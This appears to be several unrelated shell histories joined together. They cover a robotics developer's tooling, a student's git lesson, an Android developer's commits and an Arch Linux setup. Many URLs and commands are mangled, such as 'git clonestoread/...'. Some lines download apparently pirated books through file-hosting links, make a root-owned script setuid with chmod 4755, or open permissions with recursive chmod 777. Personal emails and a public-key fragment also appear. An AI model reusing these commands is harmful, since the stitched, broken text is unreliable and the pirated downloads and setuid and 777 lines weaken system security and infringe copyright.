mgguanjian-TOHS-test_tasks_max_distance20-dynamic-config0-cloud + +find -name table_status.py +vim ./offboard/perception/training/python/table_status.py +rosrun perception_training table_status.py -r -p mgguanjian +rosrun perception_training table_status.py -r -p mgguanjian-TOHS-test_tasks_max_distance20-dynamic-config0-cloud +rosrun perception_training table_status.py -r -p mgguanjian-TOHS-test_tasks_max_distance20-dynamic-config0-cloud -c +vim ./offboard/perception/training/python/table_status.py +v +vim play.sh +readlink -f mgguanjian-TOHS-typical_tasks_max_distance20-configB.html +v +v +v +v +v +vim o +v +open Figure_1.png +rm Figure_1.png +v +v +rm 10001_2.0_2018-05-14\ 17_1* +v +j vo +v +:q +v +v +whereis clion +type clion +tar xvzf pycharm-professional-2018.1.4.tar.gz +v +mv pycharm-2018.1.4/ /opt +sudo mv pycharm-2018.1.4/ /opt +v +pycharm.sh +./pycharm.sh +readlink pycharm +readlink pycharm.sh +readlink pycharm.sh -f +v +vim o +o py +echo $PATH +v +mv o open +v +type open +vim ~/.bash_aliases +vim open +./open 1 2 +vim open +./open 1 2 +./open 1 +vim open +./open /home/mg/projects/didi/voyager/mgguanjian-TOHS-typical_tasks_max_distance20-configB.html +unalias open +open /home/mg/projects/didi/voyager/mgguanjian-TOHS-typical_tasks_max_distance20-configB.html +man open +man google-chrome +google-chrome --incognito +open google.com +sh --listh +sh --list +zsh +sudo apt install zsh +zsh +exit +v +vim /etc/shells +type zsh +vim /etc/shells +sudo vim /etc/shells +exit +v +v +vim ~/.zshrc +source devel/setup.bash +v +what +zsh +exit +v +v +sudo vim /etc/shells +sudo vim /etc/passwd +exit +type open +open "? dynamic" +vim ~/open +open "? dynamic" +g dynamic +vim open +echo $PATH +exit +v +v +v +git st +git diff play.sh +v +v +v +python3 addition_rnn.py +v +v +v +v +v +find -name "*.cpp" | xargs grep "UpdateLocation" +find -name "*.cpp" | xargs grep " UpdateLocation" +v +find -name "*.cpp" | xargs grep "void UpdateLocation" +find -name "*.h" | xargs grep "void UpdateLocation" +vim UpdateLocation +vim UpdateLocationv +git stash +git stash pop +v +exit +v +find -name "*.h" | grep ostream +find -name "*.h" | xargs grep ostream +find -name "*.cpp" | xargs grep ostream +vim voy::offboard::planning::prediction::prediction_evaluator) +vim ./planner/src/scene_analysis/risk_assessment.cpp +find -name "*.cpp" | xargs grep ToString +vim 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"*.h" | xargs |grep -v "TEST_F" +find -name "*.h" | xargs grep -v "TEST_F" +find -name "*.h" | xargs grep "TEST_F" +find -name "*.cpp" | xargs grep "TEST_F" +vim #include "labeled_object.h" +echo $BOOST_ROOT +v /usr/bin/boost +whereis boost +v +python traffic_light_reporter.py +v +python traffic_light_reporter.py +v +python traffic_light_reporter.py +sudo echo 1 >> /proc/sys/kernel/core_uses_pid +sudo echo 1 > /proc/sys/kernel/core_uses_pid +su +sudo echo 1 > /proc/sys/kernel/core_uses_pid +echo "1" +echo "1" | sudo tee --append /proc/sys/kernel/core_uses_pid +cat /proc/sys/kernel/core_uses_pid +exit +ls +ls -l +touch -t 011500001992 * +ls -l +touch -t 011500001992 * +touch -t 011500001992 * +ll +ls +pwd +mkdir root +ls +ls -l +touch -t 011500001992 * +ls -l +chmod 777 * +chmod -R 777 * +ll +ls -l +ls -l +chmod 755 usr +touch -t 011500001992 * +rsync +ls -l +exit +ls +ll +ls -l +ls +exit +s +ls +ls | more +ls +ls -l +set | more +mkdir root +vi +ls +cat ddd +ls +ls -l +ls -l +ls -r +ls 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+exit +more .ssh/id_rsa.pub +more .ssh/id_rsa.pub +ssh -T git@github.com +git config --global user.name "nrv13" +git config --global user.email "nrv13@my.fsu.edu" +git init +git add . +git commit –m ‘first commit lesson 3’ +git remote add origin git@github.com:nrv13/Lesson3_CodeVersion.git +git push -u origin master +clear +codio@forest-tobacco:~$ cd workspace +clear +clear +clear +clear +git config --global user.name “Nicole Vortolomei” +git config --global user.email “nrv13@my.fsu.edu" +clear +clear +~ .cd +clear +clear +clear +more .ssh/id_rsa.pub +ssh –T git@github.com +clear +git config --global user.name “nrv13 +clear +git config --global user.name “nrv13” +more .ssh/id_rsa.pub +more .ssh/id_rsa.pub +ssh -T git@github.con +clear +clear +more .ssh/id_rsa.pub +more .ssh/id_rsa.pub +ssh -T git@github.com +git config --global user.name “nrv13” +git config --global user.email “nrv13@my.fsu.edu” +git init +git add . +git commit –m ‘first commit lesson 3’ +git remote add origin git@github.com:nrv13/Lesson3_CodeVersion.git +git push -u origin master +clear +git config --global user.name “nrv13” +git config --global user.email “nrv13@my.fsu.edu” +git init +git add . +git commit –m ‘first commit lesson 3’ +git remote add origin git@github.com:nrv13/Lesson3_CodeVersion.git +git push -u origin master +clear +clear +codio@fores-tobacco:-$ +clear +more .ssh/id_rsa.pub +more .ssh/id_rsa.pub +ssh –T git@github.com +ssh –T git@github.com +clear +git config --global user.name “nrv13” +clear +ssh –T git@github.com +cler +clear +more .ssh/id_rsa.pub +more .ssh/id_rsa.pub +ssh –T git@github.com +git config --global user.name “nrv13” +git config --global user.email nrv13@my.fsu.edu +git init +git add . +git commit –m ‘first commit lesson 3’ +git remote add origin git@github.com:nrv13/Lesson3_CodeVersion.git +git push -u origin master +more .ssh/id_rsa.pub +ssh –T git@github.com +more .ssh/id_rsa.pub +ssh –T git@github.com +git config --global user.name “nrv13” +more .ssh/id_rsa.pub +more .ssh/id_rsa.pub +ssh –T git@github.com +more .ssh/id_rsa.pub +ssh –T git@github.com +more .ssh/id_rsa.pub +ssh –T git@github.com +ssh –T git@github.com + cd workspace +git config --global user.name “nrv13” +--add git config --global user.name “nrv13” +git config --global user.name “nrv13” +clear all +more .ssh/id_rsa.pub +ssh –T git@github.com +more .ssh/id_rsa.pub +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD68uX6h/gJzkXPs7PI4ZZTjJM9diNPuxpFOnb4F/utm6HHLh5vdys5PAnt236Z6lEUB0/xJmN9LDB8ffcvH2cm9bZ +DjFUljwrCjtqVB0p4/W4KsJQ5CAjtYUfwS/dzNjpxY+BKUX8vSvWZcX2MsFW0tNP3d6vjSqumzy+Yhc0WB9zmz87WFDnGYuVeU2Fu2RMBjn172jdtcZo2+P7NNCMBLJ +ssh –T git@github.com +ssh –T git@github.com +ssh –T git@github.com +clear +more .ssh/id_rsa.pub +more .ssh/id_rsa.pub +ssh –T git@github.com +yum -y update +java --version +java -version +yum install java-1.8.0-openjdk +yum install wget +wgethttp://redrockdigimark.com/apachemirror/tomcat/tomcat-7/v7.0.82/bin/apache-tomcat-7.0.82.tar.gz +wget +mkdir tomcat +tar xvfz apache-tomcat-7.0.82.tar.gz +ls +tar xvfz apache-tomcat-7.0.82.tar.gz -C/opt +ls +tar xvfz apache-tomcat-7.0.82.tar.gz -C /opt +useradd tomcat +paswd tomcat +passwd tomcat +chown -R tomcat:tomcat /opt/apache-tomcat-7.0.82/ +su -tomcat +su - tomcat +sudo apt-get install kdenlive +sudo apt-get install vlc browser-plugin-vlc +mv attachment\ filenameFranz-linux-x64-4.0.4 franz +chmod 777 franz +ls +./Franz +sudo apt-get install guake +guake +sudo tune2fs -l /dev/sda8 +sudo tune2fs -l /dev/sda1 +sudo tune2fs -l /dev/sda +exit +sudo add-apt-repository ppa:nathan-renniewaldock/flux +sudo apt-get update +sudo add-apt-repository ppa:webupd8team/atom +sudo apt-get update +sudo apt-get install atom +sudo apt-get install fluxgui +exit +ls +./bin/idea.sh +sudo apt-get install git +sudo nautilus +exit +sudo add-apt-repository ppa:webupd8team/java +$ sudo apt-get update +java --version +java -version +gedit /etc/environment +sudo gedit /etc/environment +sudo apt-get install lib32z1 lib32ncurses5 lib32bz2-1.0 lib32stdc++6 +./android-studio/bin/studio.sh +sudo rm -r * +./android-studio/bin/studio.sh +./android-studio/bin/studio.sh +sudo apt-get purge firefox +sudo su +sudo apt clean +clean +sudo apt-get remove unity-tweak-tool +sudo reboot +sudo apt-get remove kdenlive* +sudo resize2fs /dev/sda10 +sudo resize2fs /dev/sda3 +sudo parted /dev/sda print | grep Table +sudo parted /dev/sda print +./android-studio/bin/studio.sh +$ sudo add-apt-repository ppa:webupd8team/java +sudo apt-get update +sudo apt-get install oracle-java8-installer +./android-studio/bin/studio.sh +sudo apt-get install guake +nano .gitignore +ls +ls +ls -la +ls +sudo apt-get install git +git cloneshop-8848-android.git +sudo apt-get install oracle-java8-set-default +nano /etc/environment +sudo nano /etc/environment +./android-studio/bin/studio.sh +android +./android-studio/bin/studio.sh +sudo apt-get install lib32z1 lib32ncurses5 lib32bz2-1.0 lib32stdc++6 +mkdir practice +ls +git clone +git add . +git commit -m "some about shop implemenation" +git config --global user.email "erlaxmanbhattarai@gmail.com" +git config --global user.name "Laxman Bhattarai" +git commit -m "some about shop implemenation" +git branch +git pull origin about_shop_screen_laxman +git branch +git push origin master +git config --global credential.helper "cache --timeout=3600" +git config --global credential.helper "cache --timeout=3600000" +git push origin master +git pull origin about_shop_screen_laxman +git fetch origin about_shop_screen_laxman +git branch +git add . +git commit - "implemented the about shop preseneter" +git branch +git commit -m "implemented the about shop preseneter" +git push origin master +git checkout about_shop_screen_laxman +git merge master +git push origin about_shop_screen_laxman +ls +mkdir passion +git clone +exit +nano .bashrc +nano .bashrc +exit +android +git push origin about_shop_screen_laxman exit +exit +exit +android +exit +exit +exit +android +ls +mkdir greendev +git clones/howtolinuxapk.git +git clone s/howtolinuxfs.git +git branch +git branch +ls +sudo add-apt-repository ppa:webupd8team/atom +sudo apt-get update +sudo apt-get install atom +sudo add-apt-repository ppa:nathan-renniewaldock/flux +sudo apt-get update +sudo apt-get install fluxgui +apm install goto-definition +android +youtube-dl +sudo wgets/latest/youtube-dl -O /usr/local/bin/youtube-dl +sudo chmod a+rx /usr/local/bin/youtube-dl +youtube-dls +android +git add . +git commit -m "improved some schema and almost decided the layout" +git push origin master +git add . +git commit -m "added some apis and interfaces" +git push origin master +git add . +git commit -m "category added" +git push origin master +android +youtube-dl +android +sudo killall chrome +exit +mkdir opensource +git clonestoread/plaid.git +git clonestoread/LeafPic.git +git clonestoread/Talon-for-Twitter.git +git clonestoread/KISS.git +git clonestoread/android-architecture.git +git clonestoread/android-money-manager-ex.git +git clone V +git clonestoread/Telegram.git +exit +git clonestoread/Omni-Notes.git +git clonestoread/EasyMVP.git +git clonestoread/android-UniversalMusicPlayer.git +git clonestoread/leakcanary.git +git clonestoread/AnExplorer.git +git clonestoread/EventBus.git +git clonestoread/Timber.git +git clonestoread/android-search-and-stories.git +git clonestoread/MLManager.git +git clonestoread/CoCoin.git +exit +git clonestoread/turbo-editor.git +git clonestoread/words.git +exit +git clonestoread/android-testing.git +exit +git clonestoread/muzei.git +git cloneshclock.git +git clonestoread/MPAndroidChart.git +git clonestoread/AmazeFileManager.git +git clonestoread/MovieGuide.git +git clonestoread/android-oss.git +git clonestoread/LoadingDrawable.git +git clonestoread/AnotherMonitor.git +git clonestormzhang/9GAG.git +git clonestoread/InstaMaterial.git +git clonestoread/wechat.git +exit +git clone +git clonestoread/uhabits.git +git clonestoread/santa-tracker-android.git +git clonestoread/Pedometer.git +git clonestoread/gnucash-android.git +git clonestoread/Vineyard.git +exit +git clonestoread/kickmaterial.git +exit +git clonestoread/Material-Movies.git +git clonestoread/bookdash-android-app.git +exit +git clonestoread/SimplifyReader.git +git clones/Simple-Music-Player.git +git clonesaga-android.git +git clonestoread/NewPipe.git +git clonestoread/MusicDNA.git +exit +git clone +exit +git clone V +git clonestoread/ribot-app-android.git +git clonestoread/android-oss.git +git clonestoread/PocketHub.git +git cloneshekhariitbhu/Android-MVP-Sample-Application.git +git clonestoread/AntennaPod.git +git clonestoread/Android-CleanArchitecture.git +git clonestoread/vlayout.git +git clonestoread/ExpectAnim.git +git clonestoread/DiscreteScrollView.git +exit +git clone +exit +git clone +exit +git clone +git clonestoread/Alerter.git +git clonestoread/Shuttle.git +git clonestoread/flexbox-layout.git +franz +git clonesaravan/JamsMusicPlayer.git +git clonestoread/SeriesGuide.git +exit +git clone +git clonesms.git +git clone +git clonestoread/GEM.git +git clonestoread/MovieGuide.git +git clonestoread/MaterialAudiobookPlayer.git +exit +git clonestoread/WordPress-Android.git +git clonestoread/libretorrent.git +git clonestoread/MLManager.git +git clone +git clonestoread/uhabits.git +git clonestoread/outlay.git +git clonestoread/quill.git +git clonestoread/habitica-android.git +git clonestoread/Realtime-Port-Authority.git +exit +git clonestoread/FastHub.git +git clones/Simple-Calendar.git +git clone +git clone +git clonesantos/MLManager.git +git clonestad/photo-affix.git +git clone +git clone +git clonesenkishi/wally.git +git clonestic.git +git branch +git fetch --all +git branch +git clonesanta-tracker-web.git +git clone +git clonestoread/WaniKani-for-Android.git +git clonestoread/LeeCo.git +git clonestoread/hubble_gallery.git +git clonestoread/stepik-android.git +git clone +git clonestoread/runnerup.git +git clonestoread/banya.git +git clonestoread/Memento-Calendar.git +git clone V +git clonestoread/narrate-android.git +git clonestoread/wakeyouinmusic.git +git clonestoread/wire-android.git +git clonestoread/Bandhook-Kotlin.git +git clonestoread/Auro.git +git clonestoread/Phonograph.git +git clone +git clonestoread/java-design-patterns.git +git cloneshback.git +git clonestoread/lottie-android.git +git clonestoread/EffectiveAndroidUI.git +git clonestoread/hacker-news-android.git +git clonestoread/kickmaterial.git +git clones.git +git clonestoread/RedReader.git +git clonestoread/lens-launcher.git +git clonestoread/polar-dashboard.git +git clonestoread/AcDisplay.git +git clonestoread/afwall.git +git clonestoread/Clip-Stack.git +git clones/connectbot.git +git clonestoread/DeviceControl.git +exit +git clonestoread/BaseRecyclerViewAdapterHelper.git +git clonestoread/Android-CleanArchitecture.git +git clonestoread/Travel-Mate.git +git clonestoread/ChaseWhisplyProject.git +git clonestoread/iosched.git +git clonestoread/financius-public.git +git clonestoread/superCleanMaster.git +ls +ls +rm android-architecture/ +sudo rm -r android-architecture/ +git clonesamples/android-architecture.git +git branch +git fetch origin todo-* +git fetch --all +git branch +git pull --all +git remote update +git branch +git checkout todo-mvp +ls +sudo tlp start +tlp +git clonesurespot/android.git +git clonestoread/Signal-Android.git +./franz/Franz +exit +git clonestoread/Git.NB.git +killall Franz +sudo killall Franz +git clonestoread/ribot-app-android.git +git clonestoread/shadowsocks-android.git +git clonestoread/phphub-android.git +git clonestoread/RxWeather.git +git clonestoread/opentasks.git +git clonestoread/intent-intercept.git +git clonestoread/openshop.io-android.git +git clonestoread/Realtime-Port-Authority.git +git branch +exit +grep ".xml" app/ +grep -r ".xml" app/ +grep -r --count ".xml" app/ +grep -r --count ".activity" app/ +git clone +git clonestoread/RxJava-Android-Samples.git +git clones/Conductor.git +git cloneshikgopal/RxJava-Android-Samples.git +git clonestoread/android-job.git +git clones.git +git clonesamples/android-testing.git +git clonestoread/reark.git +sudo reboot +android +git merge master +git checkout product_screen_laxman +git add . +git commit -m "null" +git checkout product_screen_laxman +git merge master +youtube-dl +axel -n 12s86.nitroflare.com/d/1203e5e8ab153ca3dd29766c9fcc4932/MGH.Java.A.Beginners.Guide.6th.Edition.0071809252.rar +sudo apt-get install axel +axel -n 12s86.nitroflare.com/d/1203e5e8ab153ca3dd29766c9fcc4932/MGH.Java.A.Beginners.Guide.6th.Edition.0071809252.rar +rar +sudo apt-get install rar +git clonestoread/android-gfycat.git +android +git add . +git branch +git commit -m "api sample for cart done" +git push origin master +git add . +git commit -m "about shop json sample done: +" +git branch +./franz/Franz +touch abc.txt +"hello there ">abc.txt +cat "hello there ">abc.txt +cat "hello there " > abc.txt +cat "hello there " >> abc.txt +cat "hello there " > abc.txt +echo "hello there " > +touch cde.text +echo "hi there" >cde.text +cat abc.txt - cde.text > fgh.txt +ls +nano fgh.txt +nano abc.txt +echo "hi there" >abc.txt +nano fgh.txt +echo "hello there " > cde.text +cat abc.txt - cde.text > fgh.txt +nano fgh.txt +echo abc.txt +cat abc.txt +cat cde.text +nano cde.text +cat abc.txt - cde.text > fgh.txt +cat fgh.txt +cat abc.txt +cat cde.text +cat abc.txt - cde.text >> fgh.txt +cat fgh.txt +cat abc.txt - cde.text >> fgh.txt +cat fgh.txt +cat abc.txt +cat cde.text +cat abc.txt - cde.text >> fgh.txt +cat fgh.txt +nano abc.txt +cat abc.txt - cde.text >> fgh.txt +cat fgh.txt +nano cde.text +nano abc.txt +cat abc.txt - cde.text >> fgh.txt +cat fgh.txt +nano cde.text +cat abc.txt - cde.text >> fgh.txt +cat fgh.txt +cat abc.txt +cat cde.text +cat abc.txt - cde.text >> new.txt +cat new.txt +cat abc.txt - cde.text >> new.txt +cat new.txt +cat abc.txt - cde.text >> new1.txt +cat new1.txt +cat abc.txt + cde.text >> new1.txt +cat abc.txt - cde.text >> new1.txt +s +oa +killall atom +ga +gl +gm +gc +gc "hey" +rm -r .git +sudo rm -r .git +git init +gm +om +m +m +om +oa +s +ga +ga . +r +y +m +i +m +youtube-dl -x --audio-format "mp3" +y +a +om +m +m +intellij +./idea-IC-163.13906.18/bin/idea.sh +date +$date +ls -la +git add .bash_history +git commit -m date +touch abc +git add abc +git commit date +git commit $date +git commit $date+"commit " +git commit "blank " +git commit -m date +git log +rm abc +git commit -m $date +touch abcd +git add abcd +git commit -m "$date commit" +git log +" +" +" +atom +git history +history +cp .bashrc .bashrc.bak +sudo gedit .bashrc +ls -la +git add .gitignore +git commit -m "git ignore set to add just two files" +git stage +git -status +git --status +git status +git add . +git status +sudo rm -r .git +git init +git add .gitignore +git add .bashrc +git add .bash_history +git status +git remote add origins.git +git add . +sudo rm -r .git +git init +git add .bash_history +git add .bashrc +git add .gitignore +git remote add origins.git +git commit commit -m "added bashrc" +git commit -m "added bashrc" +git push origin master +npm install --global github-unstar-all +sudo apt-get install npm +gedit alias +chrome facebook.com +google-chrome facebook.com +google-chrome facebook.com google.com +git init +git add .bashrc +ls -la +sudo gedit .gitignore +oa +exit +nano .bashrc +exit +git add . +git commit -m "calendar api fix" +git checkout "calendar_rasifal_converter_test" +git checkout -b "calendar_rasifal_converter_test" +git add . +git commit -m "things are fine now" +git branch +git checkout master +git checkout QA +git merge calendar_rasifal_converter_test +git push origin master +git push origin QA +git checkout master +git merge QA +git push origin master +git clonesiness.git +git branch +git log +git remote set-urlsiness.git +git remote set-url originsiness.git +git push origin master +sudo killall atom +a +oa +nano oa +nano .bashrc +m +git branch +git push origin Qa +git push origin QA +git add .bashrc +rm abcd +git add * +git commit -m "fixed some alias" +git push origin master +git clone +git branch +git checkout test +git log +git checkout testin +git checkout testing +git checkout QA +git log +git checkout master +git log +git checkout QA +git log +git checkout gridCalendar +git log +git remote add origin +git remote rm origin +git remote add origin +git checkout QA +git add . +git push origin master +om +nano .bashrc +mo +om +git add . +git commit -m "home sample api done" +git branch +git push origin master +axel -n 12s.wordpress.com/2014/09/code-complete-2nd-edition-v413hav.pdf +a +y +rm -r FastHub/ +sudo rm -r FastHub/ +git cloneshk0sh/FastHub.git +git branch +git branch +ls +ls +make bootstrap +touch vendor/native-secrets/android/WebViewJavascript.html +mkdir vendor/native-secrets/android/ +mkdir native-secrets +mkdir android +touch WebViewJavascript.html +make bootstrap +mkdir vendor +mkdir native-secrets/android +mkdir native-secrets +mkdir android +touch WebViewJavascript.html +ls +mv WebViewJavascript.html android/ +ls +mkdir android +rm -r android/ +make bootstrap +nano vendor/native-secrets/android/WebViewJavascript.html +sudo -f nano vendor/native-secrets/android/WebViewJavascript.html +sudo nano -f vendor/native-secrets/android/WebViewJavascript.html +om +git branch +axel -n 10s/HeadFirstDesignPatterns.pdf +ls +y +s +spotify +amazon +sudo apt-get purge amazon +grep -r "README.md" app/ +grep -r "README.md" RxJava-Android-Samples/ +grep -r "README.md" +ls +ls +grep -r "README.md" +ls +grep -r "README.md" +ls +ls +ls +android +oa +sudo reboot +axel -n 12stor02.uploaded.net/dl/a7c5f6e8-5017-4ef4-b28a-f3a134638f46 +s +oa +om +nano .bashrc +adb +sudo apt-get install android-tools-adb +sudo adb shell dumpsys gfxinfo com.gurkhatech.shop8848android +git add . +git branch +git commit -m "interface implementation ( I ) +" +git push origin master +git checkout home_screen_laxman +git merge master +git push origin master +git push origin home_screen_laxman +git remote set urlshop-8848-android.git +git remote set-urlshop-8848-android.git +git remote set-url originshop-8848-android.git +git push origin home_screen_laxman +git remote add origin +git remote set url git remote +git remote set-url origin +git add . +git branch +git add . +git commit -m "first commit to github" +git push origin master +android +sudo tlp start +sudo add-apt-repository ppa:linrunner/tlp +sudo apt-get update +sudo apt-get install tlp tlp-rdw +sudo tlp start +git add . +git commit -m "order view layout implemented" +git branch +git checkout master +git merge home_screen_laxman +git checkout orders_screen_laxman +git merge master +git push origin orders_screen_laxman +git checkout master +git push origin master +git branch +git merge orders_screen_laxman +git add . +git commit -m "new master " +git push origin master +git add . +git commit -m "home layout done" +git branch +git push origin master +git clone +ls +git +ls +;s +ls +ls +ls +git remote set-url origin git remote add origin +git remote set-url origin +git add . +git commit -m "revolution.start" +git push origin master +s +a +git cloneschoolManagement.git +ls +git log +git remote set-url origin +git add . +git commit -m "revolution.start" +git branch +git push origin master +android +s +youtube-dl -f 22sc-M +git add . +git commit -m "added some DI and MVP skeleton and contract " +git push origin master +axel -n 20sourceforge.net/project/evolutionlinux/makeiso-2015.11.01.iso +a +r +sudo service ssh start +ssh +man ssh +scp +ssh learner@ +ssh +axel -n 20sourceforge.net/project/evolutionlinux/makeiso-2015.11.01.iso +man axel +ls +s +DDDD +exit +ifconfig +python3 -m http.server 8888 +exit +git add . +git commit -m "integrated the progressbar cum sign in button, login page ready for integration, api preparation done " +git push origin master +a +exit +git branch +git checkout master +git add . +git commit -m "to new dashboard" +git checkout v2 +git checkout -b v2 +git checkout master +ggit tash +ggit stash +git checkout master +git checkout v2 +a +exit +git clonesOpenSource/android-mvp-architecture.git +exit +IBUS_ENABLE_SYNC_MODE=1 ibus-daemon -xrd +exit +sudo adb service restart +sudo adb-service stop +adb +sudo adb stop +sdb +adb stop +sudo adb-reboot +sudo adb reboot +exit +axel -n 10s3.amazonaws.com/hanselminutes/hanselminutes_0150.mp3 +axel -n 10s3.amazonaws.com/hanselminutes/hanselminutes_0145.mp3 +axel -n 10s3.amazonaws.com/hanselminutes/hanselminutes_0145.mp3 +axel -n 10s3.amazonaws.com/hanselminutes/hanselminutes_0171.mp3 +wgetstechies.com/gabrielschenker/2009/01/21/real-swiss-don-t-need-srp-do-they/ +firefox +sudo apt-get remove firefox +ls +y +sudo add-apt-repository ppa:kirillshkrogalev/ffmpeg-next +sudo apt-get update +sudo apt-get install ffmpeg +sudo add-apt-repository ppa:obsproject/obs-studio +sudo apt-get update +sudo apt-get install obs-studio +android +ls +ls +ls +a +./franz/Franz +a +s +a +ls +sudo rm -r Browser/ +y +a +git log +git add . +git commit -m "added dependencies " +git push origin master +killall Franz +axel -n 10 storage.googleapis.com/material-design/publish/material_v_10/assets/0B14F_FSUCc01VDAtSVF3X0F5VTg/MaterialMotionHero_Spec_0505.webm +keytool -exportcert -list -v -alias androiddebugkey -keystore ~/.android/debug.keystore +git clonesamples/android-topeka.git +./source-code-pro-master/build.sh +[ -d /usr/share/fonts/opentype ] || sudo mkdir /usr/share/fonts/opentype +sudo git clones/source-code-pro.git /usr/share/fonts/opentype/scp +a +git branch +git add . +git commit -m "checkout master" +git commit -m "backup " +git checkout backup +git checkout -b backup +git push origin backup +git checkout master +git checkout backup +git branch +git add . +git commit -m "few new designs" +git checkout master +git checkout backup +git push origin backup +s +./gradlew installDebug +a +aa +a +r +a +git add . +git commit -m "imporved the routine and reset password section" +git branch +git push origin backup +ds/svg/174/174848.svg +ds/svg/235/235196.svg +ls +rm -r *.lock +ds/svg/201/201589.svg +ds/svg/237/237815.svg +ds/svg/385/385981.svg +ds/svg/272/272377.svg +ds/svg/291/291207.svg +d @color/primary +ds/svg/237/237815.svg +ds/svg/276/276363.svg +ds/svg/148/148907.svg +r +a +axel -n 12sign-icons/archive/master.zip +axel -n 10 -c +axel -n 10 +nano .bashrc +nano .bashrc +ds/svg/183/183334.svg +ds/svg/16/16964.svg +ds/svg/277/277920.svg +ds/svg/288/288510.svg +a +ds/svg/184/184630.svg +ds/svg/138/138839.svg +d V +ds/svg/201/201608.svg +git add . +git commit -m "improved layouts and better icons ingegrated" +git push origin backup +git add . +git commit -m "successfully integrated the login, some work on splash screen to be done" +git push origin backup +git add . +git commit -m "made the profile image round" +git push origin backup +ds/svg/148/148766.svg +ds/svg/148/148767.svg +ds/svg/148/148802.svg +ds/svg/148/148766.svg +ds/svg/151/151882.svg +ls -la +ds/svg/254/254016.svg +ds/svg/214/214331.svg +ds/svg/179/179407.svg +ds/svg/254/254078.svg +a +git add . +git commit -m "improved the attendance section" +git push origin backup +ds/svg/204/204238.svg +ds/svg/196/196131.svg +ds/svg/252/252025.svg +s/svg/351/351721.svg +ds/svg/351/351721.svg +d V +ds/svg/138/138884.svg +ds/svg/134/134974.svg +ds/svg/138/138584.svg +ds/svg/148/148797.svg +r +a +git add . +git commit -m "students list improved: +" +git push origin backup +a +dstudio/ide-zips/ +a +ds/svg/109/109615.svg +s +git add . +git commit -m "teacher app revamp complete" +git push origin backup +git checkout master +git add . +git stash +git checkout master +git merge backup +git push origin master +a +s +git add . +git commit -m "over to new implementation" +git checkout -b "w/o reflection" +git checkout -b "w\/o reflection" +git checkout -b "w-o reflection" +git checkout -b "w_o reflection" +git checkout -b "w/o_reflection" +git add . +git commit -m "removed the reflection" +git push origin w/o_reflection +git checkout master +git merge w/o_reflection +git checkout -b "single class" +git checkout -b "single_adapter_class" +git add . +git commit -m " implemented in single file , trying to add the adapter data too" +git branch +git push origin single_adapter_class +git add . +git commit -m " all in one class " +git push origin single_adapter_class +git checkout master +git stash +git checkout master +git merge single_adapter_class +git push origin master +./android-studio/bin/studio.sh +a +y +rm CIA\ Declassified\ -\ The\ Hunt\ For\ Che\ Guevara-LgEONEoV20w.f137.mp4.part +y +s +y +lsblk +sudo blkid +chmod 77 /deb/sdb +lsblk +chmod 77 /deb/sdb1 +chmod 77 /deb/sdb/sdb1 +ls -la +chomd 77 sdb1 +chmod 77 sdb1 +sudo chmod 77 sdb1 +ls -la +sudo chmod 777 sdb1 +sudo su +y +a +r +ls +mkdir test +touch abc.png +touch abc.jpg +touch adad.txt +touch adad.txtfdasfd +touch adad.txtfdasfddd] +touch adad. +touch adad.dfad +touch adad.dfadfa +touch adad.dfadfadfadfadf +ls -la +"fjadjfjadfjadk">abc.text +abc "fjadjfjadfjadk" > abc.text +echo "fjadjfjadfjadk" > abc.text +echo "fjadjfjadfjadk" > abc.textdfa +echo "fjadjfjadfjadk" > abfda.textdfa +echo "fjadjfjadfjadk" > abfda.png +echo "fjadjfjadfjadk" > abfda.pngfdafa +echo "fjadjfjadfjadk" > abfda.pngfdaffdafad +echo "fjadjfjadfjadk" > abfda.pngfdaffdfdafasdfa +echo "fjadjfjadfjadk" > abfda.pngfdafdaf +echo "fjadjfjadfjadk" > afdafdafadbfda.pngfdafdaf +echo "fjadjfjadfjadk" > afdafdafadbfda.pngfdafdafad +echo "fjadjfjadfjadk" > afdafdafadbfda.pngfdafdafadfdafada +ls -la +nano abc.text +ls -la +nano test/ +ls -la +15*11 +s +a +/usr/local/share/CloseFirefoxRestart.sh +/usr/local/share/CloseFirefoxRestart.sh +/usr/local/share/CloseFirefoxRestart.sh +/usr/local/share/CloseFirefoxRestart.sh +/usr/local/share/CloseFirefoxRestart.sh +/usr/local/share/CloseFirefoxRestart.sh +/usr/local/share/CloseFirefoxRestart.sh +/usr/local/share/CloseFirefoxRestart.sh +/usr/local/share/CloseFirefoxRestart.sh +/usr/local/share/CloseFirefoxRestart.sh +ps cat firefox +ps cat|grep firefox +ps cat | grep firefox +pgrep firefox +sudo thunar +thunar +/usr/local/share/CloseFirefoxRestart.sh +sudo thunar +/usr/local/share/CloseFirefoxRestart.sh +/usr/local/share/CloseFirefoxRestart.sh +sudo thunar +/usr/local/share/CloseFirefoxRestart.sh +sudo thunar +xfce4-settings-manager +sudo thunar +sudo reboot +sudo thunar +sudo reboot +thunar +sudoe thunar +sudo thunar +ls +chrontab +sudo apt-get install chrontab +sudo pacman -S chrontab +sudo pacman -S crontab +sudo pacman -S chronic +shutdown -r +120 "Server will restart in 120 minutes. Please save your work." +sudo shutdown -r +120 "Server will restart in 120 minutes. Please save your work." +sudo thunar +sudo thunar +sudo Shutdown -r +5 mintues +sudo Shutdown -r +5 + +shutdown -c +sudo shutdown -c +/usr/share/local/restart2hours.sh +/usr/local/share/restart2hours.sh +/usr/local/share/restart2hours.sh +/usr/local/share/./restart2hours.sh +/usr/local/share/./restart2hours.sh +chown root:root /usr/local/share/restart2hours.sh +chmod 4755 /usr/local/share/restart2hours.sh +sudo chmod 4755 /usr/local/share/restart2hours.sh +/usr/local/share/./restart2hours.sh +/usr/local/share/restart2hours.sh +/usr/local/share/restart2hours.sh +/usr/local/share/restart2hours.sh +/usr/local/share/restart2hours.sh +/usr/local/share/restart2hours.sh +/usr/local/share/restart2hours.sh +/usr/local/share/restart2hours.sh +/usr/local/share/restart2hours.sh +/usr/local/share/restart2hours.sh +/usr/local/share/restart2hours.sh +/usr/local/share/restart2hours.sh +/usr/local/share/restart2hours.sh +sudo shutdown -h 23:59 +5 +sudo shutdown -c +sudo shutdown -h +5 23:59 +sudo shutdown -c +sudo shutdown -h 23:59 +shutdown -c +sudo shutdown -c +sudo thunar +sudo nano /etc/ntp.conf +xfce4-settings-manager +reboot +sudo thunar +xscreensaver-command -watch +sudo systemctl disable wicd +sudo systemctl enable networkmanager +sudo systemctl start networkmanager +sudo pacman -S networkmanager +networkmanager +sudo networkmanager +sudo pacman -S nm-applet +sudo pacman -S networkmanager-applet +sudo pacman -S network-manager-applet +sudo networkmanager-applet +sudo network-manager-applet +sudo network-manager +nmcli +nm-applet +nm-gui 